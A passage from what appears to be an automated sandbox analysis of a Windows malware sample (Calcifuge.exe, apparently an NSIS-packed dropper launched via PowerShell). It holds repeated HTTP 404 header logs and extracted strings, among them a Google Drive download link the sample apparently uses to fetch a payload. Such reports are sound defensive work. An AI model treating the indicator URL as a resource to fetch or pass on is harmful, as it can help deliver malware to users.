https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgT_x5rtIIXqYxIkKHJGIL5YYVD0Ec2JWNNgKtAL5EBKvaT7MOS6XWG3MVUUnS12bQVlContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:03 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-61RmDkyh32boM5cVfe-2Lw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQWXf7ns6deNNoSXRMSz6eIaAnAEE0RhzmHg_oGEsZdcd75xEweEHosjEUMXDaAgf9UfAP9T84Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:05 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-IlHjAJcJ_9mfYtrLrqBjkQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSQbf7AyJOtEdZhRnKoXfDCVkdU56DIgx3DitzMT44VtqD-eGsZ9qb2uLtcJDT3n0CNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:08 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-zDPM3XdZqNqAWWMAlXQdTw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQKkP60NIDgEohueAlR17uU2GbLtiiBJKRDvV5qwIwsM9oRl6XM4T3mSJZxRl-HFXcNContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:10 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-k_KXH2BzuqMaH0MFO7zbZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSbbiD62kraKvvuu3MZ9Dbq3DnRP836M5H8NBtX54p6Tz7Io9v26iZ0sNLWo0-PT6ebb_G0dBMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:12 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-r3mSy8_vFSl0NRCkUz1qPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQlQiztYfzb5Cw3AnNZ6vldyE9UFHzFm6rShExmjYQrl_VnCLITv8spmut8F5eiaOyoH5IaI4MContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:15 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-iF-sJ2IIt1uldkia9Ec98w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ0fDEVSCdESLiu7qFHiMo3Df33jDibUjM32xY8Wnnnrg-1UXbcv04fhgOn-5P3T2XLContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:17 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-6l1rmoCeEBb8h9XUjAIHSg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ90Klv6Snc7PsAzuRft5W7ZiuF6Ro8kg3evHbdBu0izI0qZK_hT0aapgI6HDAW7u4ISEXVnNEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:19 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-69DEQxRekV8Eo3r2bUpjQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTc4uaSEo6QrpOmhQaovRKT5zDTB1rCcoJgk9fDy9eix_F9c93ignVFYTmB9YuzdfN3qeB23GgContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:21 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-oMJ3axvNQWE2b_gheugbgg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQ2VlrdF3xxGmaoJEXdrFEG-jAqB5m1o-GUEI_agm4ifUP2I_638LVMe9LB5W6pvx40luMwxakContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:24 GMTContent-Security-Policy: script-src 'nonce-VKpycSgaapTKQWwjzxq95g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSa8xXcBMP2cImUQNK7_X4ldih_6pHcgu-V9km2ltnFqcFcyEG5F8nKPHEP88vGSc48GZN5K10Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:26 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-1oS_KEGaPphbIX4rFVe1eg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgS8cQ0kWj-oudw8qbCzmOa1EJoW5KumnoCikkFPmbhR4Ngi5_c197TvS68Lkayg37REULMgrz8Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 02:53:28 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-dL7VXpJCvqk05agcTG3-1A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: powershell.exe, 00000001.00000002.1999999428.0000000008A31000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
      Source: powershell.exe, 00000001.00000002.1994611870.00000000078E9000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.mi
      Source: LMSxhK1u8Z.exe, Calcifuge.exe.1.dr String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
      Source: Calcifuge.exe, 00000006.00000001.1984960895.0000000000649000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Calcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Calcifuge.exe, 00000006.00000001.1984960895.00000000005F2000.00000020.00000001.01000000.00000008.sdmp String found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005141000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
      Source: powershell.exe, 00000001.00000002.1986896418.0000000005297000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
      Source: Calcifuge.exe, 00000006.00000003.2698191444.00000000023DF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://apis.google.com
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
      Source: powershell.exe, 00000001.00000002.1990657807.00000000061AB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
      Source: Calcifuge.exe, 00000006.00000003.2320749731.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2275591148.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2240725215.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2446624829.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2264096214.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2388023562.00000000023B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1__K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=d
00000006.00000003.2469244508.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2526007166.00000000023B5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/K97xhSgiaAKAN4Rb1oxo_tdpY9Md3o&export=downloadel
      Source: Calcifuge.exe, 00000006.00000003.2836089164.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2869418209.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2423875201.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2720820376.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2400265218.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2709155403.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2354322909.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2732007460.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2332167352.00000000023B5000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 00000006.00000003.2309819742.00000000023B2000.00000004.00000020.00020000.00000000.sdmp, Calcifuge.exe, 